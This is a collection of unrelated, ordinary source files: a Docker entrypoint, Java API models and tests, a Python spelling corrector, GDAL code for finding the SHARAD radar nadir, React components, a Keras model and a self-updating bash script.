      "use_default_downloading_agent": true,
      "custom_downloading_agent": "",
      "multi_user_mode": false,
      "allow_advanced_download": false,
      "use_cookies": false,
      "jwt_expiration": 86400,
      "logger_level": "info"
    }
  }
}
EOF
# Fail fast from here on: abort on any error or use of an unset variable.
set -eu
CMD="forever app.js"
# if the first arg starts with "-" pass it to program
if [ "${1#-}" != "$1" ]; then
  set -- "$CMD" "$@"
fi
# chown current working directory to current user
# Only when running as root with the default command: fix ownership of files
# not owned by $UID, then re-exec this script as the unprivileged $UID:$GID.
if [ "$*" = "$CMD" ] && [ "$(id -u)" = "0" ]; then
  find . \! -user "$UID" -exec chown "$UID:$GID" -R '{}' + || echo "WARNING! Could not change directory ownership. If you manage permissions externally this is fine, otherwise you may experience issues when downloading or deleting videos."
  exec su-exec "$UID:$GID" "$0" "$@"
fi
# Replace this shell with the requested command (PID 1 handoff).
exec "$@"
|
/*
* Revolut for Business OpenAPI
* No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator)
*
* The version of the OpenAPI document: 1.0.0
*
*
* NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
* https://openapi-generator.tech
* Do not edit the class manually.
*/
package biz.turnonline.ecosystem.revolut.business.draft.model;
import com.fasterxml.jackson.annotation.JsonInclude;
import com.fasterxml.jackson.annotation.JsonProperty;
import com.fasterxml.jackson.annotation.JsonPropertyOrder;
import io.swagger.annotations.ApiModelProperty;
import java.time.LocalDate;
import java.util.Objects;
import java.util.UUID;
/**
* PaymentOrderInfo
*/
@JsonPropertyOrder( {
PaymentOrderInfo.JSON_PROPERTY_ID,
PaymentOrderInfo.JSON_PROPERTY_SCHEDULED_FOR,
PaymentOrderInfo.JSON_PROPERTY_TITLE,
PaymentOrderInfo.JSON_PROPERTY_PAYMENTS_COUNT
} )
public class PaymentOrderInfo
{
public static final String JSON_PROPERTY_ID = "id";
public static final String JSON_PROPERTY_SCHEDULED_FOR = "scheduled_for";
public static final String JSON_PROPERTY_TITLE = "title";
public static final String JSON_PROPERTY_PAYMENTS_COUNT = "payments_count";
private UUID id;
private LocalDate scheduledFor;
private String title;
private Integer paymentsCount;
public PaymentOrderInfo id( UUID id )
{
this.id = id;
return this;
}
/**
* Get id
*
* @return id
**/
@ApiModelProperty( required = true, value = "" )
@JsonProperty( JSON_PROPERTY_ID )
@JsonInclude( value = JsonInclude.Include.ALWAYS )
public UUID getId()
{
return id;
}
public void setId( UUID id )
{
this.id = id;
}
public PaymentOrderInfo scheduledFor( LocalDate scheduledFor )
{
this.scheduledFor = scheduledFor;
return this;
}
/**
* Get scheduledFor
*
* @return scheduledFor
**/
@javax.annotation.Nullable
@ApiModelProperty( value = "" )
@JsonProperty( JSON_PROPERTY_SCHEDULED_FOR )
@JsonInclude( value = JsonInclude.Include.USE_DEFAULTS )
public LocalDate getScheduledFor()
{
return scheduledFor;
}
public void setScheduledFor( LocalDate scheduledFor )
{
this.scheduledFor = scheduledFor;
}
public PaymentOrderInfo title( String title )
{
this.title = title;
return this;
}
/**
* Get title
*
* @return title
**/
@javax.annotation.Nullable
@ApiModelProperty( value = "" )
@JsonProperty( JSON_PROPERTY_TITLE )
@JsonInclude( value = JsonInclude.Include.USE_DEFAULTS )
public String getTitle()
{
return title;
}
public void setTitle( String title )
{
this.title = title;
}
public PaymentOrderInfo paymentsCount( Integer paymentsCount )
{
this.paymentsCount = paymentsCount;
return this;
}
/**
* Get paymentsCount
*
* @return paymentsCount
**/
@ApiModelProperty( required = true, value = "" )
@JsonProperty( JSON_PROPERTY_PAYMENTS_COUNT )
@JsonInclude( value = JsonInclude.Include.ALWAYS )
public Integer getPaymentsCount()
{
return paymentsCount;
}
public void setPaymentsCount( Integer paymentsCount )
{
this.paymentsCount = paymentsCount;
}
@Override
public boolean equals( java.lang.Object o )
{
if ( this == o )
{
return true;
}
if ( o == null || getClass() != o.getClass() )
{
return false;
}
PaymentOrderInfo paymentOrderInfo = ( PaymentOrderInfo ) o;
return Objects.equals( this.id, paymentOrderInfo.id ) &&
Objects.equals( this.scheduledFor, paymentOrderInfo.scheduledFor ) &&
Objects.equals( this.title, paymentOrderInfo.title ) &&
Objects.equals( this.paymentsCount, paymentOrderInfo.paymentsCount );
}
@Override
public int hashCode()
{
return Objects.hash( id, scheduledFor, title, paymentsCount );
}
@Override
public String toString()
{
StringBuilder sb = new StringBuilder();
sb.append( "class PaymentOrderInfo {\n" );
sb.append( " id: " ).append( toIndentedString( id ) ).append( "\n" );
sb.append( " scheduledFor: " ).append( toIndentedString( scheduledFor ) ).append( "\n" );
sb.append( " title: " ).append( toIndentedString( title ) ).append( "\n" );
sb.append( " paymentsCount: " ).append( toIndentedString( paymentsCount ) ).append( "\n" );
sb.append( "}" );
return sb.toString();
}
/**
* Convert the given object to string with each line indented by 4 spaces
* (except the first line).
*/
private String toIndentedString( java.lang.Object o )
{
if ( o == null )
{
return "null";
}
return o.toString().replace( "\n", "\n " );
}
}
|
-- Employees whose name starts with 'J' and who earn more than 25000.
SELECT *
FROM employees
WHERE name LIKE 'J%'
  AND salary > 25000;
<gh_stars>1-10
package grpcgraphql.animal;
import io.grpc.stub.StreamObserver;
import org.lognet.springboot.grpc.GRpcService;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.util.List;
@GRpcService
/**
 * gRPC service serving a fixed in-memory list of animals.
 */
public class AnimalService extends AnimalServiceGrpc.AnimalServiceImplBase {
    private static final Logger LOG = LoggerFactory.getLogger(AnimalService.class);

    // Immutable demo dataset; the request "id" is used as an index into this list.
    private static final List<AnimalOuterClass.Animal> ALL_ANIMALS = List.of(
            AnimalOuterClass.Animal.newBuilder()
                    .setName("Pulpo")
                    .setColor("pink")
                    .addAllCountry(List.of("A", "F"))
                    .build(),
            AnimalOuterClass.Animal.newBuilder()
                    .setName("Croco")
                    .setColor("green")
                    .addAllCountry(List.of("A", "B", "F"))
                    .build(),
            AnimalOuterClass.Animal.newBuilder()
                    .setName("Gato")
                    .setColor("black")
                    .addCountry("E")
                    .build(),
            AnimalOuterClass.Animal.newBuilder()
                    .setName("Chicko")
                    .setColor("yellow")
                    .addAllCountry(List.of("A", "B", "C", "D"))
                    .build()
    );

    /**
     * Returns all animals when the request id is empty, otherwise the single
     * animal at the given zero-based index.
     */
    @Override
    public void getAnimals(AnimalOuterClass.AnimalRequest request, StreamObserver<AnimalOuterClass.AnimalsReply> responseObserver) {
        final AnimalOuterClass.AnimalsReply.Builder replyBuilder =
                AnimalOuterClass.AnimalsReply.newBuilder();
        String animalId = request.getId();
        if (animalId == null || "".equals(animalId)) {
            replyBuilder.addAllAnimal(ALL_ANIMALS);
        } else {
            // NOTE(review): a non-numeric or out-of-range id throws
            // NumberFormatException / IndexOutOfBoundsException here, which
            // surfaces to the client as an UNKNOWN gRPC error — consider
            // validating and calling responseObserver.onError instead.
            replyBuilder.addAnimal(ALL_ANIMALS.get(Integer.parseInt(animalId)));
        }
        responseObserver.onNext(replyBuilder.build());
        responseObserver.onCompleted();
        LOG.info("================> getAnimals done for id: {}", animalId);
    }
}
|
import tensorflow as tf
def modify_tensor(x: tf.Tensor, stride: int, si: int) -> tf.Tensor:
    """Reshape ``x`` into groups of ``stride`` along a new axis and sum over it.

    The last dimension of ``x`` must be divisible by ``stride`` (integer
    division in the reshape silently truncates otherwise — TODO confirm
    callers guarantee divisibility).
    """
    # Normalize a negative starting index relative to the last dimension.
    if si < 0:
        si = x.shape[-1] + si
    # NOTE(review): `si` is never used after the normalization above — either
    # the adjustment is dead code or the reshape/sum below was meant to start
    # at `si`. Confirm intended behavior before relying on this function.
    reshaped_tensor = tf.reshape(x, (-1, stride, x.shape[-1] // stride))
    # Collapse the stride axis by summation.
    modified_tensor = tf.reduce_sum(reshaped_tensor, axis=1)
    return modified_tensor
import re
import collections
def words(text):
    """Return every maximal run of ASCII letters in `text`, lowercased."""
    lowered = text.lower()
    return re.findall(r'[a-z]+', lowered)
def train(features):
    """Build a frequency table over `features`.

    Unseen keys default to 1 (add-one smoothing), so lookups on novel words
    never return zero.
    """
    counts = collections.defaultdict(lambda: 1)
    for feature in features:
        counts[feature] = counts[feature] + 1
    return counts
# Module-level word-frequency model built from the training corpus.
# NOTE(review): requires big.txt in the working directory, and the file
# handle is never closed — consider a `with open(...)` block.
NWORDS = train(words(open('big.txt').read()))
def edits1(word):
    """Return the set of all strings exactly one edit away from `word`.

    Edits considered: single-character deletion, adjacent transposition,
    single-character replacement, and single-character insertion.
    """
    # Bug fix: the original referenced a module-level `alphabet` that is
    # never defined anywhere in this file, so every call raised NameError.
    # Define it locally to make the function self-contained.
    alphabet = 'abcdefghijklmnopqrstuvwxyz'
    splits = [(word[:i], word[i:]) for i in range(len(word) + 1)]
    deletes = [a + b[1:] for a, b in splits if b]
    transposes = [a + b[1] + b[0] + b[2:] for a, b in splits if len(b) > 1]
    replaces = [a + c + b[1:] for a, b in splits for c in alphabet if b]
    inserts = [a + c + b for a, b in splits for c in alphabet]
    return set(deletes + transposes + replaces + inserts)
def known_edits2(word):
    """Return words from NWORDS reachable from `word` by exactly two edits."""
    return set(e2 for e1 in edits1(word) for e2 in edits1(e1) if e2 in NWORDS)
def known(words):
    """Filter `words` down to those present in the NWORDS model."""
    return set(w for w in words if w in NWORDS)
def correct(word):
    """Return the most probable spelling correction for `word`.

    Candidate preference order: the word itself if known, then known words
    one edit away, then two edits away, falling back to the word unchanged.
    Ties are broken by corpus frequency (NWORDS).
    """
    candidates = known([word]) or known(edits1(word)) or known_edits2(word) or [word]
    return max(candidates, key=NWORDS.get)
<gh_stars>10-100
# -*- coding: utf-8 -*-
import unittest.mock as mock
import testutils.cases as cases
import app.authentication.emails as emails
class TestAuthenticationEmails(cases.TestCase):
    """Test cases for outbound emailing capabilities related to authentication.

    NOTE(review): the '<EMAIL>'/'<PASSWORD>' literals are anonymization
    placeholders left by a dataset scrub — replace with real fixtures to run.
    """

    @mock.patch('app.notifications.email.Mailer.deliver')
    def test_reset_password(self, mock_deliver):
        """It should call the Mailer.deliver method with the proper template.
        """
        uid = '1'
        email = '<EMAIL>'
        token = '<PASSWORD>'
        emails.reset_password(email, uid, token)
        # Deliver is expected to receive the recipient, subject line, and
        # the template context containing the reset token.
        mock_deliver.assert_called_with(
            email,
            'Here\'s a link to reset your password',
            {'email': email, 'token': token, 'uid': uid},
        )

    @mock.patch('app.notifications.email.Mailer.deliver')
    def test_password_was_reset(self, mock_deliver):
        """It should call the Mailer.deliver method with the proper template.
        """
        email = '<EMAIL>'
        emails.password_was_reset(email)
        mock_deliver.assert_called_with(
            email,
            'Your Metamapper password was changed',
            {'to_address': email},
        )
|
/**
 * Factory for Redux action creators namespaced by an entity name.
 * e.g. `new Action('user')` yields creators producing the types
 * LIST_USER, RELATIONS_USER and DELETE_USER.
 */
export default class Action {
  constructor(name) {
    this.name = name.toUpperCase();
  }

  /** Action carrying a fetched list of objects. */
  list = (list) => {
    return { type: `LIST_${this.name}`, list };
  };

  /** Action carrying related-object data. */
  relations = (relationsData) => {
    return { type: `RELATIONS_${this.name}`, relationsData };
  };

  /** Action requesting deletion of the object with the given id. */
  deleteObj = (deleteId) => {
    return { type: `DELETE_${this.name}`, deleteId };
  };
}
/**
* @license
* Copyright 2016 Google Inc. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// View that renders whatever is on top of a foam.u2.stack.Stack, exporting
// the stack as 'stack' so child views can push/pop.
foam.CLASS({
  package: 'foam.u2.stack',
  name: 'StackView',
  extends: 'foam.u2.View',

  requires: [
    'foam.u2.stack.Stack'
  ],

  exports: [ 'data as stack' ],

  properties: [
    {
      // The stack being displayed; a fresh Stack is created when none is supplied.
      name: 'data',
      factory: function() { return this.Stack.create(); }
    },
    {
      // When true, renders the stack's actions (e.g. back/forward) above the view.
      class: 'Boolean',
      name: 'showActions',
      value: true
    }
  ],

  methods: [
    // TODO: Why is this init() instead of initE()? Investigate and maybe fix.
    function init() {
      this.setNodeName('div');
      this.addClass(this.myClass());

      if ( this.showActions ) {
        this.start('actions')
          .add(this.data.cls_.getAxiomsByClass(foam.core.Action))
          .end();
      }

      // Re-render whenever the top of the stack changes. s is the stack
      // slot value: s[0] is the view spec, s[1] its parent context holder.
      this.add(this.slot(function(s) {
        if ( ! s ) return this.E('span');
        var view   = s[0];
        var parent = s[1];
        // Do a bit of a dance with the context, to ensure that exports from "parent"
        // are available to "view"
        var X = parent ? this.__subSubContext__.createSubContext(parent) : this.__subSubContext__;
        return foam.u2.ViewSpec.createView(view, null, this, X);
      }, this.data$.dot('top')));
    }
  ]
});
|
<reponame>raulrozza/Gametask_Web
import { useFormikContext } from 'formik';
import React, { useCallback } from 'react';
import { FaPlus } from 'react-icons/fa';
import IRank from 'shared/domain/entities/IRank';
import { Container } from './styles';
interface AddItemButtonProps {
  handlePush(rank: IRank): void;
}

interface IRankValues {
  ranks: IRank[];
}

/**
 * Button that appends a new, blank rank to the formik `ranks` array.
 * The new rank's level is one past the last existing rank, or 1 when
 * the list is empty.
 */
const AddItemButton: React.FC<AddItemButtonProps> = ({ handlePush }) => {
  const formik = useFormikContext<IRankValues>();

  const onClick = useCallback(() => {
    const { ranks } = formik.values;
    const lastRank = ranks[ranks.length - 1];

    handlePush({
      level: lastRank ? lastRank.level + 1 : 1,
      tag: '',
      name: '',
      color: '',
    });
  }, [formik.values, handlePush]);

  return (
    <Container type="button" onClick={onClick}>
      <FaPlus />
    </Container>
  );
};

export default AddItemButton;
|
# Input image shape expected by the network: 224x224 RGB.
input_shape = (224, 224, 3)

# NOTE(review): the original script first built and compiled a small
# Sequential CNN here and then immediately rebound `model` to the
# MobileNet-based model below, so the Sequential model was dead code;
# it has been removed.

# Transfer-learning model: ImageNet-pretrained MobileNet backbone without
# its classification head, plus a small custom head for 2 classes.
base_model = MobileNet(input_shape=input_shape,
                       weights='imagenet',
                       include_top=False)
x = base_model.output
x = GlobalAveragePooling2D()(x)
x = Dense(1024, activation='relu')(x)
# 'softmax' (not 'sigmoid') is the correct pairing with
# categorical_crossentropy for mutually exclusive classes: it makes the
# two outputs a proper probability distribution.
base_model_output = Dense(2, activation='softmax',
                          name='predictions')(x)
model = Model(inputs=base_model.input, outputs=base_model_output)

# Compile the model
model.compile(loss='categorical_crossentropy',
              optimizer='adam', metrics=['accuracy'])
<filename>api/src/main/java/io/mifos/identity/api/v1/domain/Permission.java
/*
* Copyright 2017 The Mifos Initiative.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.mifos.identity.api.v1.domain;
import io.mifos.anubis.api.v1.domain.AllowedOperation;
import org.hibernate.validator.constraints.NotBlank;
import javax.validation.Valid;
import javax.validation.constraints.NotNull;
import java.util.Objects;
import java.util.Set;
/**
* @author <NAME>
*/
/**
 * Value object pairing a permittable endpoint group with the set of
 * operations a holder of this permission may perform on it.
 */
@SuppressWarnings({"WeakerAccess", "unused"})
public class Permission {
  /** Identifier of the permittable endpoint group this permission targets. */
  @NotBlank
  private String permittableEndpointGroupIdentifier;

  /** Operations the holder may perform on that group. */
  @NotNull
  @Valid
  private Set<AllowedOperation> allowedOperations;

  public Permission() {
  }

  public Permission(String permittableEndpointGroupIdentifier, Set<AllowedOperation> allowedOperations) {
    this.permittableEndpointGroupIdentifier = permittableEndpointGroupIdentifier;
    this.allowedOperations = allowedOperations;
  }

  public String getPermittableEndpointGroupIdentifier() {
    return permittableEndpointGroupIdentifier;
  }

  public void setPermittableEndpointGroupIdentifier(String permittableEndpointGroupIdentifier) {
    this.permittableEndpointGroupIdentifier = permittableEndpointGroupIdentifier;
  }

  public Set<AllowedOperation> getAllowedOperations() {
    return allowedOperations;
  }

  public void setAllowedOperations(Set<AllowedOperation> allowedOperations) {
    this.allowedOperations = allowedOperations;
  }

  @Override
  public boolean equals(Object o) {
    if (this == o) return true;
    // Exact-class comparison (not instanceof), matching hashCode's contract.
    if (o == null || getClass() != o.getClass()) return false;
    final Permission other = (Permission) o;
    return Objects.equals(permittableEndpointGroupIdentifier, other.permittableEndpointGroupIdentifier)
        && Objects.equals(allowedOperations, other.allowedOperations);
  }

  @Override
  public int hashCode() {
    return Objects.hash(permittableEndpointGroupIdentifier, allowedOperations);
  }

  @Override
  public String toString() {
    return "Permission{"
        + "permittableEndpointGroupIdentifier='" + permittableEndpointGroupIdentifier + '\''
        + ", allowedOperations=" + allowedOperations
        + '}';
  }
}
|
<reponame>cxq257990/sweet81
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package com.taobao.weex.ui.component;
import com.taobao.weappplus_sdk.BuildConfig;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.powermock.core.classloader.annotations.PowerMockIgnore;
import org.robolectric.RobolectricGradleTestRunner;
import org.robolectric.annotation.Config;
import java.util.HashMap;
import java.util.Map;
import static org.junit.Assert.*;
/**
* Created by sospartan on 8/9/16.
*/
@RunWith(RobolectricGradleTestRunner.class)
@Config(constants = BuildConfig.class, sdk = 19)
@PowerMockIgnore( {"org.mockito.*", "org.robolectric.*", "android.*"})
public class TextareaTest {

  // Component under test; created fresh for every test method.
  Textarea component;

  @Before
  public void setUp() throws Exception {
    component = EditComponentTest.createTextarea();
    ComponentTest.create(component);
  }

  // Smoke test: apply every known edit-component property with every
  // test value and assert nothing throws during updateProperties().
  @Test
  public void testSetProperty() throws Exception {
    Map<String, Object> props = new HashMap<>();
    int len = EditComponentTest.PROPS.length;
    for (int i = 0; i < len; i++) {
      for (Object obj : EditComponentTest.TEST_VALUES[i]) {
        props.put(EditComponentTest.PROPS[i], obj);
        component.updateProperties(props);
      }
    }
  }

  @After
  public void tearDown() throws Exception {
    ComponentTest.destory(component);
  }
}
|
<filename>surfPow/nadir.py
from osgeo import gdal, osr
from gdalconst import *
import numpy as np
import sys
'''
set of functions and classes for finding nadir location of SHARAD radargrams.
authors: <NAME> & <NAME>
created: 30January2018
updated: 05APR19
'''
class Dem:
    """Holds a single-band DEM raster's pixel data plus the metadata
    needed to map coordinates to pixels (projection, geotransform,
    nodata value)."""

    def __init__(self, dem_path):
        # Open read-only via GDAL.
        src_dem = gdal.Open(dem_path, GA_ReadOnly)
        self.csys = src_dem.GetProjection()    # WKT coordinate system string
        self.gt = src_dem.GetGeoTransform()    # 6-element affine geotransform
        self.nd = src_dem.GetRasterBand(1).GetNoDataValue()
        # Some rasters carry no nodata value; use the most negative double
        # as a sentinel so it can never collide with a real elevation.
        # (Was `== None`; `is None` is the correct identity test.)
        if self.nd is None:
            self.nd = -np.finfo('d').max
        self.data = np.array(src_dem.GetRasterBand(1).ReadAsArray())
        src_dem = None  # drop the reference to release the GDAL dataset
class Loc:
    """A location in 3D space, in either cartesian or geodetic
    coordinates. The two are switched between often in this program so
    they share one class: x doubles as longitude, y as latitude, z as
    the radius."""

    def __init__(self, x, y, z):
        self.x = x       # x / longitude
        self.y = y       # y / latitude
        self.z = z       # z / radius (or elevation)
        self.ol = False  # "overlap/out-of-limit" flag, set by callers
        self.nd = False  # "nodata" flag, set by callers

    def __eq__(self, other):
        # Component-wise equality; comparison against None is False.
        if other is None:
            return False
        return self.x == other.x and self.y == other.y and self.z == other.z

    def __ne__(self, other):
        return not self.__eq__(other)

    def __str__(self):
        return '(' + str(self.x) + ',' + str(self.y) + ',' + str(self.z) + ')'

    def __add__(self, vec):
        # Only allowed to add vectors (objects with .i/.j/.k) to points.
        return Loc(self.x + vec.i, self.y + vec.j, self.z + vec.k)

    def __radd__(self, vec):
        # vec + point == point + vec (addition commutes).
        return self.__add__(vec)

    def __sub__(self, vec):
        # Only allowed to subtract vectors from points.
        return Loc(self.x - vec.i, self.y - vec.j, self.z - vec.k)

    def __rsub__(self, vec):
        # vec - point, component-wise. BUGFIX: this previously returned
        # self + vec (copied from __radd__), which is wrong because
        # subtraction does not commute.
        return Loc(vec.i - self.x, vec.j - self.y, vec.k - self.z)

    def copy(self):
        # Independent copy; note ol/nd flags are reset to False.
        return Loc(self.x, self.y, self.z)

    def topix(self, dem):
        # Transform this point to an (x, y) pixel location on a DEM using
        # the DEM's geotransform.
        # IF YOU USE THIS ON ITS OWN WITHOUT THE toground() FUNCTION FOR A
        # Path, MAKE SURE THE POINT COORDINATES ARE IN THE SAME COORDINATE
        # SYSTEM AS THE GEOTRANSFORM.
        gt = dem.gt
        x = int((gt[0] - self.x) / -gt[1])
        y = int((gt[3] - self.y) / -gt[5])
        # Out-of-bounds handling: signal "off the DEM" with pixel (-1,-1)
        # rather than clamping to the raster edge.
        if x < 0 or y < 0 or x >= dem.data.shape[1] or y >= dem.data.shape[0]:
            return Loc(-1, -1, 0)
        out = Loc(x, y, 0)
        # (A MOLA-specific row-overlap check used to live here, setting
        # out.ol for rows < 116 or > 22412.)
        return out

    def equals(self, other):
        # Method-form equality check, kept for existing callers;
        # equivalent to ==.
        if self.x == other.x and self.y == other.y and self.z == other.z:
            return True
        return False
class Path:
    """A list of Loc objects representing a path, plus the coordinate
    system string ('csys', Proj4 or WKT) the points are expressed in."""

    def __init__(self, csys=None, pts=None):
        # BUGFIX: the original signature used a mutable default (pts=[]),
        # so every Path() created without an explicit list shared ONE list
        # object and appends leaked across instances.
        self.pts = pts if pts is not None else []
        self.csys = csys

    def __setitem__(self, i, item):
        self.pts[i] = item

    def __getitem__(self, i):
        return self.pts[i]

    def __len__(self):
        return len(self.pts)

    def append(self, loc):
        # Append one Loc. (Parameter renamed from 'Loc' so it no longer
        # shadows the Loc class.)
        self.pts.append(loc)

    def copy(self):
        # Shallow copy: new Path and new list, same point objects.
        return Path(self.csys, self.pts[:])

    def transform(self, targ):
        # Transform this Path to another coordinate system; accepts Proj4
        # or WKT for both source and target. Returns a NEW Path; self is
        # left unmodified.
        pts = self.copy()
        source = osr.SpatialReference()
        target = osr.SpatialReference()
        # Decide whether each coordinate system is WKT or Proj4: WKT
        # starts with e.g. 'GEOGCS'/'PROJCS' ('G'/'P'), Proj4 with '+'.
        sc0 = pts.csys[0]
        if sc0 == 'G' or sc0 == 'P':
            source.ImportFromWkt(pts.csys)
        else:
            source.ImportFromProj4(pts.csys)
        tc0 = targ[0]
        if tc0 == 'G' or tc0 == 'P':
            target.ImportFromWkt(targ)
        elif tc0 == '+':
            target.ImportFromProj4(targ)
        else:
            print("Unrecognized target coordinate system:")
            print(targ)
            sys.exit()
        # The actual transformation, applied point by point.
        transform = osr.CoordinateTransformation(source, target)
        xform = transform.TransformPoint
        for i in range(len(pts)):
            npt = list(xform(pts[i].x, pts[i].y, pts[i].z))
            pts[i] = Loc(npt[0], npt[1], npt[2])
        pts.csys = targ
        return pts

    def toground(self, dem, outsys=None):
        # Return the points on the ground directly below this path.
        # Not destructive: returns a new Path, in `outsys` when given,
        # otherwise back in this path's original coordinate system.
        grd = self.copy()  # copy to store on-ground points
        origsys = grd.csys
        # Transform to the DEM coordinate system so the geotransform math works.
        grd = grd.transform(dem.csys)
        # Replace each point's z with the DEM elevation beneath it; points
        # that fall off the DEM get the nodata value instead.
        for i in range(len(grd)):
            zpix = grd[i].topix(dem)
            if zpix.x == -1 and zpix.y == -1:
                grd[i].z = dem.nd
            else:
                grd[i].z = float(dem.data[zpix.y][zpix.x])
        # Hand back in the requested (or original) coordinate system.
        if not (outsys is None):
            grd = grd.transform(outsys)
        else:
            grd = grd.transform(origsys)
        return grd
#### NAV IMPORT ####
def GetNav_geom(navfile):
    """Read a SHARAD nav ("geom") CSV file and return the spacecraft
    positions as a Path of spheroid-referenced (lon, lat, radius [m])
    points.

    The file's columns 2-4 are x, y, z position vectors in km; they are
    converted to meters and then transformed from 3D cartesian to
    geographic coordinates."""
    # 'with' guarantees the file handle is closed even on error.
    with open(navfile, 'r') as f:
        navdat_raw = f.read().split('\n')

    del navdat_raw[0]   # drop the header row
    del navdat_raw[-1]  # drop the empty entry left by the trailing newline

    # Pass pts explicitly so every call starts from a fresh, empty list
    # (guards against Path's shared mutable default argument).
    navdat = Path(pts=[])
    for line in navdat_raw:
        if len(line) > 0:
            fields = line.split(',')
            # x,y,z position vectors, converted from km to meters.
            navdat.append(Loc(float(fields[2]) * 1000,
                              float(fields[3]) * 1000,
                              float(fields[4]) * 1000))

    # Transform x,y,z position vectors from 3D cartesian to geographic coords
    geocsys = '+proj=longlat +a=3396000 +b=3396000 +no_defs'
    navdat.csys = '+proj=geocent +a=3396000 +b=3396000 +no_defs'
    navdat = navdat.transform(geocsys)  # spheroid referenced lat, long, rad [m]
    return navdat
<filename>client/src/components/startup/registration/TermsScreen.js
// @flow
import React from 'react';
import { Alert, AsyncStorage, Button, Dimensions, StyleSheet, Text, View } from 'react-native';
import { ButtonBox } from '../../design/ButtonBox';
import { GS } from '../../style';
import { D, i18n } from '../../../i18n/index';
import { TERMS_OF_SERVICE } from '../../../resources/terms_of_service';
import { PRIVACY_POLICY } from '../../../resources/privacy_policy';
import { KEY_AGREED_TERMS } from '../../../models/global_storage_keys';
import { DefaultScrollView } from '../../design/DefaultScrollView';
import type { Navigator } from '../../../types';
type Props = {|
back?: () => void,
next?: () => void,
navigation?: Navigator<*>,
showAlert?: boolean,
|};
// Screen that shows the terms of service and privacy policy. The "agree"
// button stays disabled until the user has scrolled to the bottom; on
// agreement a flag is persisted to AsyncStorage before continuing.
export class TermsScreen extends React.PureComponent {
  props: Props;

  state = { scrolledToBottom: false };

  componentDidMount() {
    // Optionally explain (via a non-cancelable alert) why the user is
    // being shown the terms again.
    if (this.props.showAlert) {
      Alert.alert(i18n(D().startup.registration.terms.alertTitle), i18n(D().startup.registration.terms.alertBody), [], {
        cancelable: false,
      });
    }
  }

  // Persist the agreement flag, then advance the flow (if a `next`
  // callback was provided).
  async onPressNext() {
    await AsyncStorage.setItem(KEY_AGREED_TERMS, JSON.stringify(true));
    if (this.props.next) {
      this.props.next();
    }
  }

  // Track whether the user has scrolled to the end of the content.
  // NOTE(review): uses the window height as a stand-in for the scroll
  // view's own height — assumes the scroll view fills the window; verify.
  handleScroll(event: Object) {
    const windowHeight = Dimensions.get('window').height;
    const height = event.nativeEvent.contentSize.height;
    const offset = event.nativeEvent.contentOffset.y;
    if (windowHeight + offset >= height) {
      this.setState({ scrolledToBottom: true });
    }
  }

  // Back button (optional) and the agree button, which is disabled until
  // the full text has been scrolled through.
  renderButtons() {
    return (
      <ButtonBox direction="horizontal">
        {this.props.back ? <Button title={i18n(D().common.back)} onPress={this.props.back} /> : []}
        {this.props.next ? (
          <Button
            title={i18n(D().startup.registration.terms.agree)}
            onPress={() => this.onPressNext()}
            disabled={!this.state.scrolledToBottom}
          />
        ) : (
          []
        )}
      </ButtonBox>
    );
  }

  render() {
    return (
      <View style={GS.flex}>
        <DefaultScrollView style={[GS.flex, GS.padding10]} onScroll={event => this.handleScroll(event)}>
          <View style={S.block}>
            <Text style={S.title}>利用規約</Text>
            <Text style={S.body}>{TERMS_OF_SERVICE}</Text>
          </View>
          <View style={S.block}>
            <Text style={S.title}>プライバシーポリシー</Text>
            <Text style={S.body}>{PRIVACY_POLICY}</Text>
          </View>
        </DefaultScrollView>
        {this.renderButtons()}
      </View>
    );
  }
}

// Local styles for the two text blocks (terms and privacy policy).
const S = StyleSheet.create({
  block: {
    margin: 5,
    marginBottom: 50,
  },
  title: {
    fontSize: 26,
    marginBottom: 5,
  },
  body: {
    fontSize: 14,
    lineHeight: 20,
  },
});
|
#!/bin/bash
# Persistent-state setter (intentionally shadows the `set` builtin).
# Usage: set NAME [VALUE]. Assigns VALUE (or keeps NAME's current value),
# then rewrites the matching `NAME=...` assignment line inside this very
# script ($0) with sed, so the value survives across invocations — the
# script is re-executed for every menu interaction.
function set() {
	eval $1='${2:-${!1}}'
	# Escape '/' and '&' so the value is safe inside the sed replacement.
	escaped=$(sed 's/[\/\&]/\\&/g' <<< "${!1}")
	sed -i "s/\(^$1=\).*/\1\"$escaped\"/" $0
}
# Build the `files` argument string from the current multi-selection,
# taken from `archive_multiple` when extracting, otherwise from
# `multiple_files`. $1 is an optional path prefix. Entries are
# '|'-separated and get turned into a quoted brace-expansion list for a
# later `eval`. Also prepares `multiple_files_notification` (newline
# separated, for the popup) and clears the consumed selection variable.
set_multiple_files() {
	if [[ ${multiple_files:-$archive_multiple} ]]; then
		[[ $option == extract_archive ]] && local var=archive_multiple || var=multiple_files
		[[ "${!var}" =~ | ]] && files="'$1'{'${!var//|/\',\'}'}" || files="'$1''${!var}'"
		[[ ! $option =~ yes|playlist ]] && end='\n\n'
		multiple_files_notification="$start\n${!var//|/\\n}$end"
		un_set $var
	fi
}
# Clear each named variable and persist the now-empty value back into the
# script via set().
function un_set() {
